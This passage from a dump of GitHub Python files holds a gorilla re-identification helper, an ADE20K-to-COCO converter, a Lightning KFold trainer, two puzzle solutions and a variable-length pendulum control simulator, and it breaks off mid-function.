f2[\"frame_idx\"]:\n print(f)\n print(f2)\n raise Exception(\"Duplicate individual detected\")\n new_tracks[identity] += tracks[track_id]\n else:\n new_tracks[identity] = tracks[track_id]\n else:\n new_tracks[f\"unknown-{unknown_count}\"] = tracks[track_id]\n unknown_count += 1\n\n return new_tracks\n\ndef is_img(file_path):\n return os.path.splitext(file_path)[1].lower() in IMAGE_FORMATS\n\ndef is_video(file_path):\n return os.path.splitext(file_path)[1].lower() in VIDEO_FORMATS\n\ndef contains_video(file_paths):\n return any(is_video(file_path) for file_path in file_paths)\n\ndef draw_label(img, bbox, identity, color):\n cv2.rectangle(img, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 3)\n cv2.rectangle(img, (int(bbox[0]), int(bbox[1]-30)), (int(bbox[0])+(len(\"Gorilla\")+len(str(identity)))*17, int(bbox[1])), color, -1)\n cv2.putText(img, \"Gorilla\" + \" : \" + str(identity),(int(bbox[0]), int(bbox[1]-11)),0, 1.2, (255,255,255),2, lineType=cv2.LINE_AA) \n\n ","repo_name":"Lasklu/gorillavision","sub_path":"reid-system/prediction_utils.py","file_name":"prediction_utils.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"11751827983","text":"import json\nimport numpy as np\nimport cv2\nfrom coco.coco import *\nimport pycocotools.mask as mask\nfrom glob import glob\nimport matplotlib.pyplot as plt\nimport random\nimport os\n\nSUPER_CLASS = \"background\"\nCLASS_NAME = \"ground\"\nDISPLAY_CLASS_NAMES = [\"ground\", \"grass\"]\nLOWER_CLASS_COLORS = [(0, 70, 30), (0, 101, 40)]\nUPPER_CLASS_COLORS = [(256, 70, 30), (256, 101, 40)]\n\n# SUPER_CLASS = \"background\"\n# CLASS_NAME = \"sea\"\n# DISPLAY_CLASS_NAMES = [\"sea\"]\n# LOWER_CLASS_COLORS = [(0, 216, 80)]\n# UPPER_CLASS_COLORS = [(130, 216, 80)]\n\n# SUPER_CLASS = \"background\"\n# CLASS_NAME = \"ground\"\n# DISPLAY_CLASS_NAMES = [\"sky\"]\n# LOWER_CLASS_COLORS = [(0, 116, 90)]\n# UPPER_CLASS_COLORS = [(80, 116, 90)]\n\nMODE = \"train\"\n# MODE = \"val\"\n\nCOCO_IMAGES_DIR_PATH = 'datasets/ADE20K_2016_07_26/coco_{}_images'.format(MODE)\n\nif not os.path.exists(COCO_IMAGES_DIR_PATH):\n os.mkdir(COCO_IMAGES_DIR_PATH)\n\nwith open(\"datasets/coco_annotations/instances_{}2017.json\".format(MODE)) as coco_json_file:\n json_data = json.load(coco_json_file)\n coco = Coco(json_data)\n\n labels_info = []\n DIR = \"training\"\n if MODE == \"train\":\n DIR = \"training\"\n else:\n DIR = \"validation\"\n mask_image_file_paths = glob('datasets/ADE20K_2016_07_26/images/{}/*/*/*_seg.png'.format(DIR))\n # mask_image_file_paths.sort()\n\n category_id = coco.get_category_id(CLASS_NAME)\n if category_id == -1:\n category_id = coco.add_category(SUPER_CLASS, CLASS_NAME)\n\n for mask_image_file_path in mask_image_file_paths:\n dir_list = mask_image_file_path.split('/')\n alphabet = dir_list[-3]\n word = dir_list[-2]\n filename_prefix = dir_list[-1]\n filename_prefix = filename_prefix.split('_seg.png')[0]\n origin_image_file_path = 'datasets/ADE20K_2016_07_26/images/{}/{}/{}/{}.jpg'.format(\n DIR, alphabet, word, filename_prefix)\n attribute_file_path = 'datasets/ADE20K_2016_07_26/images/{}/{}/{}/{}_atr.txt'.format(\n DIR, alphabet, word, filename_prefix)\n\n has_class = False\n with open(attribute_file_path) as attribute_file:\n while True:\n line_str = attribute_file.readline()\n if not line_str:\n break\n\n data_list = line_str.split(\" # \")\n for display_class_name in DISPLAY_CLASS_NAMES:\n if data_list[3] == display_class_name or data_list[4] == display_class_name:\n has_class = True\n break\n\n if not has_class:\n continue\n\n filename = origin_image_file_path.split('/')[-1]\n im = cv2.imread(origin_image_file_path)\n\n if im is None:\n print(\"im is None\", origin_image_file_path)\n continue\n\n origin_mask_image = cv2.imread(mask_image_file_path)\n # hsv = cv2.cvtColor(origin_mask_image, cv2.COLOR_BGR2HSV)\n mask_all = np.zeros([origin_mask_image.shape[0], origin_mask_image.shape[1]])\n for i in range(len(LOWER_CLASS_COLORS)):\n img_mask = cv2.inRange(origin_mask_image, LOWER_CLASS_COLORS[i], UPPER_CLASS_COLORS[i])\n mask_all = np.clip(mask_all + img_mask, 0, 255)\n mask_all = mask_all.astype('uint8')\n img_result = cv2.bitwise_and(origin_mask_image, origin_mask_image, mask=mask_all)\n mask_image = cv2.cvtColor(img_result, cv2.COLOR_BGR2GRAY)\n _, mask_image = cv2.threshold(mask_image, 1, 255, 0)\n\n # plt.subplot(2, 2, 1)\n # plt.title(filename_prefix)\n # plt.imshow(im)\n # plt.subplot(2, 2, 2)\n # plt.imshow(origin_mask_image)\n # plt.subplot(2, 2, 3)\n # plt.imshow(img_result)\n # plt.subplot(2, 2, 4)\n # plt.imshow(mask_image, 'gray')\n # plt.show()\n\n contours, hierarchy = cv2.findContours(mask_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n segmentation = []\n for contour in contours:\n contour = contour.flatten().tolist()\n if len(contour) > 4:\n segmentation.append(contour)\n if len(segmentation) == 0:\n continue\n\n rle = mask.encode(np.asfortranarray(mask_image))\n area = mask.area(rle)\n bbox = mask.toBbox(rle)\n\n id = coco.find_image_id_by_filename(filename)\n\n # 해당 파일을 갖고 있지 않으면 coco에 이미지 파일 추가\n if id == -1:\n id = coco.get_new_image_id()\n coco.add_image(1, filename, None, im.shape[0], im.shape[1], None, None, id)\n print('{} is created'.format(filename))\n else:\n print('{} is already exist'.format(filename))\n\n print('add annotation', origin_image_file_path)\n coco.add_annotation(segmentation, area, 0, id, [int(v) for v in bbox], category_id)\n\n dst_path = \"{}/{}\".format(COCO_IMAGES_DIR_PATH, filename)\n if not os.path.exists(dst_path):\n op = \"cp {} {}\".format(origin_image_file_path, dst_path)\n os.system(op)\n\n print('작성 중...')\n f = open(\"{}_annotation.json\".format(MODE), \"w\")\n f.write(str(coco))\n f.close()\n print('완료!')\n\n","repo_name":"kyoodong/Tryangle-Research","sub_path":"DataFormatConverter/ade20k.py","file_name":"ade20k.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33595577556","text":"import os.path as osp\nfrom typing import Any, List, Optional, Sequence, Union\n\nimport torch\nfrom lightning.pytorch import LightningDataModule, LightningModule, Trainer\nfrom lightning.pytorch.utilities import rank_zero_info\nfrom lightning.pytorch.utilities.model_helpers import is_overridden\nfrom torch.utils.data import DataLoader\n\nfrom pl_crossvalidate.datamodule import KFoldDataModule\nfrom pl_crossvalidate.ensemble import EnsembleLightningModule\n\n\nclass KFoldTrainer(Trainer):\n \"\"\"Trainer for KFold cross validation.\n\n This trainer is a plug-in replacement for the `Trainer` class from `lightning` package. It does not alter any of\n the existing functionality, only extends it with the ability to perform KFold cross validation. In total three\n new public methods are added:\n\n - `cross_validate`: Performs KFold cross validation on a given model\n - `create_ensemble`: Creates an ensemble model from a list of trained models\n - `out_of_sample_score`: Computes the out-of-sample score for a given model\n\n The two latter of the methods are intended to be called after the `cross_validate` method has been called.\n\n Args:\n num_folds: Number of folds\n shuffle: Whether to shuffle the data before splitting it into folds\n stratified: Whether to use stratified sampling e.g. for classification we make sure that each fold has the same\n ratio of samples from each class as the original dataset\n args: Arguments passed to the underlying lightning `Trainer` class\n kwargs: Keyword arguments passed to the underlying lightning `Trainer` class\n \"\"\"\n\n def __init__(self, num_folds: int = 5, shuffle: bool = False, stratified: bool = False, *args, **kwargs) -> None:\n # Input validation for the cross validation arguments\n if not isinstance(num_folds, int) or num_folds < 2:\n raise ValueError(\"Expected argument `num_folds` to be an integer larger than or equal to 2\")\n self.num_folds = num_folds\n if not isinstance(shuffle, bool):\n raise ValueError(\"Expected argument `shuffle` to be an boolean\")\n self.shuffle = shuffle\n if not isinstance(stratified, bool):\n raise ValueError(\"Expected argument `stratified` to be an boolean\")\n self.stratified = stratified\n\n # Intialize rest of the trainer\n super().__init__(*args, **kwargs)\n self._version = self.logger.version\n\n def _construct_kfold_datamodule(\n self,\n train_dataloader: Optional[DataLoader] = None,\n val_dataloaders: Optional[Union[DataLoader, Sequence[DataLoader]]] = None,\n datamodule: Optional[Union[LightningDataModule, KFoldDataModule]] = None,\n ) -> KFoldDataModule:\n return KFoldDataModule(\n self.num_folds,\n self.shuffle,\n self.stratified,\n train_dataloader=train_dataloader,\n val_dataloaders=val_dataloaders,\n datamodule=datamodule,\n )\n\n @property\n def log_dir(self) -> Optional[str]:\n \"\"\"Overwrite default method until https://github.com/Lightning-AI/lightning/issues/17168 is resolved.\"\"\"\n if len(self.loggers) > 0:\n dirpath = self.logger.log_dir\n else:\n dirpath = self.default_root_dir\n\n dirpath = self.strategy.broadcast(dirpath)\n return dirpath\n\n def cross_validate(\n self,\n model: LightningModule,\n train_dataloader: Optional[DataLoader] = None,\n val_dataloaders: Optional[Union[DataLoader, Sequence[DataLoader]]] = None,\n datamodule: Optional[Union[LightningDataModule, KFoldDataModule]] = None,\n ) -> List[Any]:\n \"\"\"Performs KFold cross validation on a given model.\n\n This is the core method added by this class. Given a model and a dataloader / datamodule it will automatically\n perform KFold cross validation. By automatically we mean that it will automatically construct the different\n folds and sequentially train and validate the model on each fold, resetting the model weights between each fold.\n\n Args:\n model: The model to perform cross validation on\n train_dataloader: Dataloader with training samples\n val_dataloaders: Dataloader with validation samples, can be a list of dataloaders for multiple validation\n datamodule: Lightning datamodule (exclusive with `train_dataloader` and `val_dataloader`)\n \"\"\"\n if not is_overridden(\"test_step\", model, LightningModule):\n raise ValueError(\"`cross_validation` method requires you to also define a `test_step` method.\")\n\n # construct K fold datamodule if user is not already passing one in\n if not isinstance(datamodule, KFoldDataModule):\n datamodule = self._construct_kfold_datamodule(train_dataloader, val_dataloaders, datamodule)\n self._kfold_datamodule = datamodule\n\n # checkpoint to restore from\n # this is a bit hacky because the model needs to be saved before the fit method\n self.strategy._lightning_module = model\n path = osp.join(self.log_dir, \"kfold_initial_weights.ckpt\")\n self.save_checkpoint(path)\n self.strategy._lightning_module = None\n\n # run cross validation\n results, paths = [], []\n for i in range(self.num_folds):\n self._set_fold_index(i, datamodule=datamodule)\n rank_zero_info(f\"===== Starting fold {i+1}/{self.num_folds} =====\")\n self.fit(model=model, datamodule=datamodule, ckpt_path=path)\n\n fold_path = osp.join(self.log_dir, f\"fold_{i}.ckpt\")\n self.save_checkpoint(fold_path)\n paths.append(fold_path)\n\n res = self.test(model=model, datamodule=datamodule, verbose=False)\n results.append(res)\n\n self._ensemple_paths = paths\n return results\n\n def _set_fold_index(self, fold_index: int, datamodule: KFoldDataModule) -> None:\n # any logger need to be reset to the new fold index and the privious experiment needs to be cleared\n if self.loggers is not None:\n for logger in self.loggers:\n if hasattr(logger, \"_version\"):\n if not hasattr(logger, \"_orig_version\"):\n logger._orig_version = (\n logger._version if isinstance(logger._version, str) else f\"version_{logger._version}\"\n )\n logger._version = logger._orig_version\n new_version = f\"{logger._version}/fold_{fold_index}\" if logger._version else f\"fold_{fold_index}\"\n logger._version = new_version\n if hasattr(logger, \"_experiment\"):\n logger._experiment = None\n\n # set the fold index for the datamodule\n datamodule.fold_index = fold_index\n\n def create_ensemble(self, model: LightningModule, ckpt_paths: Optional[List[str]] = None) -> LightningModule:\n \"\"\"Create an ensemble from trained models.\n\n Args:\n model: An instance of the model to create an ensemble over.\n ckpt_paths: If not provided, then it assumes that `cross_validate` have been already called\n and will automatically load the model checkpoints saved during that process. Else expect\n it to be a list of checkpoint paths to individual models.\n\n Example:\n >>> trainer = Trainer()\n >>> trainer.cross_validate(model, datamodule)\n >>> ensemble_model = trainer.create_ensemble(model)\n\n \"\"\"\n if ckpt_paths is None:\n if hasattr(self, \"_ensemple_paths\"):\n ckpt_paths = self._ensemple_paths\n else:\n raise ValueError(\n \"Cannot construct ensemble model. Either call `cross_validate`\"\n \"beforehand or pass in a list of ckeckpoint paths in the `ckpt_paths` argument\"\n )\n return EnsembleLightningModule(model, ckpt_paths)\n\n def out_of_sample_score(\n self,\n model: LightningModule,\n datamodule: Optional[KFoldDataModule] = None,\n ckpt_paths: Optional[List[str]] = None,\n ) -> LightningModule:\n \"\"\"Performs out of sample scoring for a given set of KFold trained models.\n\n Out of sample scoring for K-fold refer to predicting on the test fold of each K-fold model.\n\n Args:\n model: The model to perform cross validation on\n datamodule: Optionally a ``KFoldDataModule`` instance. If not provided, then it assumes that\n `cross_validate` have been already called and will automatically use the same ``KFoldDataModule`` use\n during that process.\n ckpt_paths: If not provided, then it assumes that `cross_validate` have been already called\n and will automatically load the model checkpoints saved during that process. Else expect\n it to be a list of checkpoint paths to individual models.\n \"\"\"\n score_method = getattr(model, \"score\", None)\n if not callable(score_method):\n raise ValueError(\"`out_of_sample_score` method requires you to also define a `score` method.\")\n\n if ckpt_paths is None:\n if hasattr(self, \"_ensemple_paths\"):\n ckpt_paths = self._ensemple_paths\n else:\n raise ValueError(\n \"Cannot construct ensemble model. Either call `cross_validate`\"\n \"beforehand or pass in a list of ckeckpoint paths in the `ckpt_paths` argument\"\n )\n\n if datamodule is None:\n if not hasattr(self, \"_kfold_datamodule\"):\n raise ValueError(\n \"Cannot compute out of sample scores. Either call `cross_validate` method before\"\n \"`out_of_sample_score` method, or provide an instance of `KFoldDataModule` in the `datamodule`\"\n \"argument.\"\n )\n else:\n datamodule = self._kfold_datamodule\n elif not isinstance(datamodule, KFoldDataModule):\n raise ValueError(\"`datamodule` argument must be an instance of `KFoldDataModule`.\")\n\n if len(ckpt_paths) != datamodule.num_folds:\n raise ValueError(\"Number of checkpoint paths provided does not match the number of folds in the datamodule\")\n\n # temporarily replace the predict_step method with the score method to use the trainer.predict method\n _orig_predict_method = model.predict_step\n model.predict_step = model.score\n\n # run prection on each fold\n outputs = []\n for i, ckpt_path in enumerate(ckpt_paths):\n self._set_fold_index(i, datamodule=datamodule)\n model.load_from_checkpoint(ckpt_path)\n out = self.predict(model=model, dataloaders=datamodule.test_dataloader())\n outputs.append(torch.cat(out, 0))\n model.predict_step = _orig_predict_method\n\n # reorder to match the order of the dataset\n test_indices = torch.cat([torch.tensor(test) for _, test in datamodule.splits])\n outputs = torch.cat(outputs, 0)\n return outputs[test_indices.argsort()]\n","repo_name":"SkafteNicki/pl_crossvalidate","sub_path":"pl_crossvalidate/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":11251,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"32"} +{"seq_id":"7326761758","text":"'''\r\nLeetCode 1029. Two City Scheduling\r\nhttps://leetcode.com/problems/two-city-scheduling/\r\n\r\nAnswers from here ⬇ \r\n- https://www.youtube.com/watch?v=OkJ1aHjAQr8\r\n- https://www.geeksforgeeks.org/python-sort-list-according-second-element-sublist/\r\n- https://stackoverflow.com/questions/4183506/python-list-sort-in-descending-order\r\n'''\r\nclass Solution:\r\n def twoCitySchedCost(self, costs: List[List[int]]) -> int:\r\n ctr_a = 0\r\n ctr_b = 0\r\n a = 0\r\n n = len(costs)\r\n \r\n for i, c in enumerate(costs):\r\n costs[i].append(abs(costs[i][0] - costs[i][1]))\r\n \r\n # costs = sorted(costs, key = lambda x: x[2])[::-1]\r\n \r\n costs = sorted(costs, key = lambda x: x[2], reverse=True)\r\n \r\n for i, c in enumerate(costs):\r\n if ctr_a < n and ctr_b < n:\r\n if costs[i][0] < costs[i][1]:\r\n ctr_a += 2\r\n a += costs[i][0]\r\n elif costs[i][1] < costs[i][0]:\r\n ctr_b += 2\r\n a += costs[i][1]\r\n \r\n elif ctr_a < n:\r\n ctr_a += 2\r\n a += costs[i][0]\r\n \r\n else:\r\n ctr_b += 2\r\n a += costs[i][1]\r\n \r\n return a\r\n ","repo_name":"RaglandCodes/Algos","sub_path":"Two City Scheduling.py","file_name":"Two City Scheduling.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36435383478","text":"# Please write your code inside the function stub below.\nimport math as m\n\n\ndef solution(n, c):\n print(c)\n c_array=[]\n for tup in c:\n c_array.append(list(tup))\n c=c_array\n count=0\n change=True\n while(change):\n print(c)\n \n tempc=[]\n for i in range(count+1):\n tempc.append(c[i])\n for j in range(count+1,len(c)):\n other=1\n added=False\n for k in c[j]:\n if k in tempc[count]:\n tempc.append(c[j,other])\n added=True\n break\n else:\n other-1\n if not added:\n tempc.append(c[j])\n if tempc[count]==c[count]:\n count+=1\n c=tempc\n if count==len(c):\n change=False\n combinations=1\n for a in c:\n combinations*=m.factorial(len(a))\n return combinations%(pow(10,9)+7)\n\n ","repo_name":"Jibbajabbafic/AdventOfCode2018","sub_path":"1down.py","file_name":"1down.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34482475852","text":"import os\nimport utils\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom functools import partial\nfrom scipy import io\n\n'''\nThis is a script that simulates the movement of variable-length pendulum.\nequation of motion:\n\n .. . .\n theta = [-2 * L * phi - g * sin(theta)] / l\n\nThe stabilization of this variable length pendulum is realized via the simple feedback control of the pendulum length. \nThe feedback control rule has the following form:\n\n .\nL = L0 * (1 + delta * phi * phi)\n\nReferences lead to: \nBewley(2020) Stabilization of low-altitude balloon systems, Part 1: rigging with a single taut ground tether, \nwith analysis as a variable-length pendulum\n\n=====================================\nAuthor : Muhan Zhao\nDate : Oct. 16, 2019\nLocation: UC San Diego, La Jolla, CA\n=====================================\n'''\n\n\nclass Pendulum:\n \"\"\"\n Oscillating Pendulum Simulator: including a novel feedback rule to stabilize the pendulum regardless the\n parameters {m, g, L0} and the exact expression of the oscillating angle.\n\n Parameters\n ------------\n\n :param wave : dict, including parameters:\n :keys frequency : float, the frequency of the oscillating angle\n :keys phi : array, the valeus of oscillating angle w.r.t. time\n :keys dphi : array, the valeus of oscillating angle's 1st-order derivative w.r.t. time\n :keys ddphi : array, the valeus of oscillating angle's 2nd-order derivative w.r.t. time\n\n :param attributes : dict, including parameters:\n :keys max_t : float, the maximum time length, default 30\n :keys dt : float, the marching time step, default 0.001\n :keys delta_mode_adaptive : string, adaptive mode is on or no\n :keys delta_adaptive_const : float, the parameter C for adaptive delta, default 0.15\n :keys delta_mode_asymptotic : string, asymptotic mode is on or no\n :keys delta_asymptotic_const : float, the value of delta for feedback rule, default 0.1\n :keys l0 : float, initial length of pendulum, default 1\n :keys Lmax : float, maximum length of pendulum, default l0*1.2\n :keys Lmin : float, minimum length of pendulum, default l0*.8\n :keys Ldotmax : float, maximum derivative of pendulum length, default 1.2\n :keys Ldotmin : float, minimum derivative of pendulum length, default .8\n :keys save_fig : bool, save fig or no\n :keys show_fig : bool, display fig or no\n :keys format_fig : string, fig format to be saved\n\n ------------\n\n Methods\n ------------\n\n :method free_pendulum_oscillation\n :method control_pendulum_oscillation\n :method adaptive_control_pendulum_oscillation\n ------------\n \"\"\"\n def __init__(self, wave, attributes):\n self.max_t = attributes.get('max_t', 30)\n self.dt = attributes.get('dt', 0.001)\n\n # steps: the time slides of control inputs\n # Problem here: sometimes, even the result of max_t/dt is an integer, but it could be\n # not exactly the input you want, because how python stores the number. Sometimes there will be\n # a small error such like 1e-10. So thats why need round here.\n self.steps = int(round(self.max_t / self.dt))\n self.time = np.linspace(0, self.max_t, self.steps)\n\n self.l0 = attributes.get('l0', 1)\n self.Ldotmax = attributes.get('Ldotmax', 5)\n self.Ldotmin = attributes.get('Ldotmin', -5)\n\n self.Lmax = attributes.get('Lmax', 1.2 * self.l0)\n self.Lmin = attributes.get('Lmin', .8 * self.l0)\n\n self.g = attributes.get('g', 9.8)\n self.m = attributes.get('m', 1)\n\n self.wave_phi = np.atleast_1d(wave['phi'])\n self.wave_dphi = np.atleast_1d(wave['dphi'])\n\n self.frequency = wave.get('frequency', np.pi/2)\n self.control_start_time = self.dt * self.wave_phi.shape[0]\n self.prev_length = self.wave_phi.shape[0]\n self.entire_t = np.arange(0, self.dt * self.prev_length + self.max_t, self.dt)\n\n self.pose_constrain_L = attributes.get('constrain_L', False)\n\n # Below is an untested idea:\n self.delta_shrinkage = .8\n # initiate the Asymptotic control mode\n self.asymptotic_control_on = attributes.get('asymptotic_mode', True)\n if self.asymptotic_control_on:\n self.delta = attributes.get('delta_asymptotic_const', 0.2)\n\n # asymptotic control parameters sequence\n self.asym_control_phi = np.zeros(self.steps)\n self.asym_control_dphi = np.zeros(self.steps)\n\n # self.asym_control_ddphi = np.zeros(self.steps)\n self.asym_control_L = np.zeros(self.steps)\n self.asym_control_L[0] = self.l0\n self.asym_control_dL = np.zeros(self.steps)\n\n else:\n pass\n\n # initiate the Adaptive control mode\n self.adaptive_control_on = attributes.get('adaptive_mode', False)\n if self.adaptive_control_on:\n self.delta_adaptive_const = attributes.get('delta_adaptive_const', 0.15)\n self.delta = attributes.get('delta_adaptive_const', 0.2)\n\n # adaptive control parameters sequence\n self.adap_control_phi = np.zeros(self.steps)\n self.adap_control_dphi = np.zeros(self.steps)\n\n # self.adap_control_ddphi = np.zeros(self.steps)\n self.adap_control_length = np.zeros(self.steps)\n self.adap_control_dlength = np.zeros(self.steps)\n\n self.adap_delta_sequence = np.zeros(self.steps)\n else:\n pass\n\n self.no_control_on = attributes.get('no_control_mode', False)\n # oscillating control sequence\n if self.no_control_on:\n self.oscillating_phi = np.zeros(self.steps)\n self.oscillating_dphi = np.zeros(self.steps)\n self.oscillating_ddphi = np.zeros(self.steps)\n else:\n pass\n\n # The pendulum length and length derivative at the current time step\n self.L = self.l0\n self.dL = 0\n\n # The time marching scheme could be used, 1 = Forward Euler or 2 = RK4\n self.time_marching_method = attributes.get('time-marching scheme', 2)\n\n # The root folder path and images folder path\n self.ROOT_PATH = os.getcwd()\n self.IMG_PATH = os.path.join(self.ROOT_PATH, 'images')\n\n # plot setting\n self.plot_trigger = attributes.get('plot', False)\n self.ylim = np.max(self.wave_phi) * 1.1\n # save fig and show fig indicator\n self.save_fig = attributes.get('save_fig', False)\n self.show_fig = attributes.get('show_fig', False)\n # saving picture in designated format\n self.format_fig = attributes.get('format_fig', '.png')\n # save data\n self.save_data = attributes.get('save_data', True)\n\n # ==================================== EQUATION OF MOTION ====================================\n def fixed_length_eom(self, x):\n '''\n ====================================\n ..\n phi = - g * sin(phi) / L;\n ====================================\n phi^n+1 - phi^n .\n ---------------- = phi^n\n dt\n . .\n phi^n+1 - phi^n\n ---------------- = -w^2 * phi^n\n dt\n ====================================\n .\n phi^n+1 = phi^n + dt * phi^n\n . .\n phi^n+1 = phi^n - dt * w^2 * phi^n\n ====================================\n :return:\n '''\n x_dot = np.empty((2, ))\n x_dot[0] = x[1]\n x_dot[1] = -self.frequency**2 * x[0]\n return x_dot\n\n def variable_length_eom(self, x):\n '''\n First compute the length for the states x;\n Second compute the time-change of the equation;\n .. . .\n phi = [-2 * L * phi - g * sin(phi)] / L\n states = [x0, x1]' = [phi, dphi]'\n :return:\n '''\n # Here we can't directly compute Ldot, otherwise it would fall into infinite loop.\n # Use Ldot = L0*delta*([d(phi)/dt]^2 + phi * d^2(phi)/dt^2), plug it back into the system dynamic\n L = self.compute_length(x)\n\n f = np.empty((2, ))\n f[0] = x[1]\n if abs(L + self.l0 * (1 + 3 * self.delta * x[0] * x[1])) > 1e-4:\n # Regarding the expression to compute f[1], use L instead of plugging L=L0[1+delta*phi*d(phi/dt)] directly,\n # easier to add constrain on L(t)\n f[1] = (-2 * self.l0 * self.delta * x[1]**3 - self.g * np.sin(x[0])) / \\\n (L + self.l0 * (1 + 3 * self.delta * x[0] * x[1]))\n else:\n f[1] = 0\n # f[1] = (-2 * self.l0 * self.delta * x[1]**3 - self.g * np.sin(x[0])) / \\\n # (L + self.l0 * (1 + 3 * self.delta_shrinkage * self.delta * x[0] * x[1]))\n print('Invalid values for denominator encountered in the computation of variable-length equation of motion')\n print('Set it to be 0 temporarily.')\n return f\n\n def compute_length(self, x):\n L = self.l0 * (1 + self.delta * x[0] * x[1])\n if self.pose_constrain_L:\n L = np.clip(L, self.Lmin, self.Lmax)\n else:\n pass\n return L\n\n def compute_length_dot(self, x):\n f = self.variable_length_eom(x)\n Ldot = self.l0 * self.delta * (x[1]**2 + x[0]*f[1])\n if self.pose_constrain_L:\n Ldot = np.clip(Ldot, self.Ldotmin, self.Ldotmax)\n else:\n pass\n return Ldot\n\n def delta_update(self, t):\n \"\"\"\n Adaptive control; To accelerate the convergence of the pendulum, set the amplitude of control inputs consisted of\n pendulum length to be large enough\n :param t: time instance\n :return:\n \"\"\"\n # combine controlled dphi with the dphi before control starts\n dphi_sequence = np.hstack((self.wave_dphi, self.adap_control_dphi[:t]))\n # 1st find the positions that dphi <= 1e-2/2\n dphi_zero_list = np.where(np.abs(dphi_sequence) <= 1e-2/2)[0]\n if len(dphi_zero_list) > 0:\n # 2nd find the last group of dphi <= 1e-2/2\n last_dphi_zero = utils.last_consecutives(dphi_zero_list)\n # 3rd find the largest amplitude of the angle in the last cycle\n phi_sequence = np.hstack((self.wave_phi, self.adap_control_phi[:t]))\n self.delta_adaptive = self.delta_adaptive_const / np.abs(np.max(phi_sequence[last_dphi_zero]))\n else:\n # dphi have not finished one peak yet\n self.delta_adaptive = self.delta_adaptive_const / 1\n self.adap_delta_sequence[t] = np.copy(self.delta_adaptive)\n\n # ==================================== MAIN SCRIPT ====================================\n def free_pendulum_oscillation(self):\n '''\n\n Reference link:http://hplgit.github.io/Programming-for-Computations/pub/p4c/._p4c-solarized-Python022.html\n :return:\n '''\n for step, _ in enumerate(self.time):\n if step == 0:\n state = np.hstack((self.wave_phi[-1], self.wave_dphi[-1]))\n else:\n state = np.hstack((self.oscillating_phi[step - 1], self.oscillating_dphi[step - 1]))\n # time marching ODE\n self.oscillating_phi[step], self.oscillating_dphi[step] = self.time_marching(state, self.fixed_length_eom)\n\n def asymptotic_control_pendulum_oscillation(self):\n for i in range(self.steps):\n if i == 0:\n state = np.hstack((self.wave_phi[-1], self.wave_dphi[-1]))\n else:\n state = np.hstack((self.asym_control_phi[i-1], self.asym_control_dphi[i-1]))\n\n # update the length of the pendulum\n self.asym_control_L[i] = self.compute_length(state)\n self.asym_control_dL[i] = self.compute_length_dot(state)\n\n # time marching the system dynamic\n self.asym_control_phi[i], self.asym_control_dphi[i] = self.time_marching(state, self.variable_length_eom)\n\n def adaptive_control_pendulum_oscillation(self):\n for step, _ in enumerate(self.time):\n if step == 0: # assemble state -> ODE, full_state -> length\n state = np.hstack((self.wave_phi[-1], self.wave_dphi[-1]))\n else:\n state = np.hstack((self.adap_control_phi[step - 1], self.adap_control_dphi[step - 1]))\n full_state = np.hstack(\n (self.adap_control_phi[step - 1], self.adap_control_dphi[step - 1], self.adap_control_ddphi[step - 1]))\n # update delta\n self.delta_update(step)\n\n # update length <- phi, phi_dot, phi_double_dot\n self.adap_control_length[step], self.adap_control_dlength[step] = self.length_update(full_state)\n\n # assemble length vector\n length = np.hstack((self.adap_control_length[step], self.adap_control_dlength[step]))\n\n # update phi_double_dot, this is for updating the length at the next time step\n self.adap_control_ddphi[step] = self.update_ddphi(state, length)\n\n # assemble the ODE\n func = partial(self.variable_length_eom, input=length)\n\n # time marching ODE\n self.adap_control_phi[step], self.adap_control_dphi[step] = self.time_marching(state, func)\n\n def main(self):\n if self.no_control_on:\n self.free_pendulum_oscillation()\n else:\n pass\n\n # invoke the asymptotic control\n if self.asymptotic_control_on:\n self.asymptotic_control_pendulum_oscillation()\n else:\n pass\n\n # invoke the adaptive control\n if self.adaptive_control_on:\n self.adaptive_control_pendulum_oscillation()\n else:\n pass\n\n # plot trigger\n if self.plot_trigger:\n self.plot()\n else:\n pass\n\n # save data\n if self.save_data:\n self.data_saver()\n\n # ==================================== TIME MARCHING SCHEME ====================================\n\n def forward_euler(self, x, func):\n x_dot = func(x)\n x_new = x + x_dot * self.dt\n return x_new\n\n def runge_kutta4(self, x, func):\n f1 = func(x)\n f2 = func(x + self.dt/2 * f1)\n f3 = func(x + self.dt/2 * f2)\n f4 = func(x + self.dt * f3)\n x_new = x + self.dt/6 * (f1 + 2*f2 + 2*f3 + f4)\n return x_new\n\n def time_marching(self, x, func):\n if self.time_marching_method == 1:\n # Forward Euler\n x_new = self.forward_euler(x, func)\n elif self.time_marching_method == 2:\n # RK4\n x_new = self.runge_kutta4(x, func)\n else:\n # new scheme needs to be claimed\n x_new = np.zeros(2)\n raise ValueError('New time-marching scheme need to specified. Otherwise set \"time-marching scheme\"=2.')\n return x_new[0], x_new[1]\n\n # ==================================== PLOT ====================================\n def plot(self):\n self.phi_plot()\n self.phase_space_plot()\n self.length_plot()\n # self.delta_plot()\n # self.phi_dphi_time_plot()\n self.energy_plot()\n # self.frequency_plot()\n\n def phi_plot(self):\n plt.figure(figsize=[16, 9])\n plt.grid()\n self.control_indicator_plot()\n if self.no_control_on:\n self.free_pendulum_plot()\n self.control_pendulum_plot()\n plt.legend()\n self.fig_save_and_show('phi')\n\n def control_indicator_plot(self):\n y = np.linspace(-1 * self.ylim, self.ylim, 200)\n t = self.control_start_time * np.ones(y.shape[0])\n plt.plot(t, y, 'g-.', label=r'$Control\\ starts$')\n\n def free_pendulum_plot(self):\n entire_free_phi = np.hstack((self.wave_phi, self.oscillating_phi))\n plt.plot(self.entire_t, entire_free_phi, 'b-', label=r'$\\phi(t) - No Control$')\n plt.xlabel(r'$t$', fontsize=21)\n 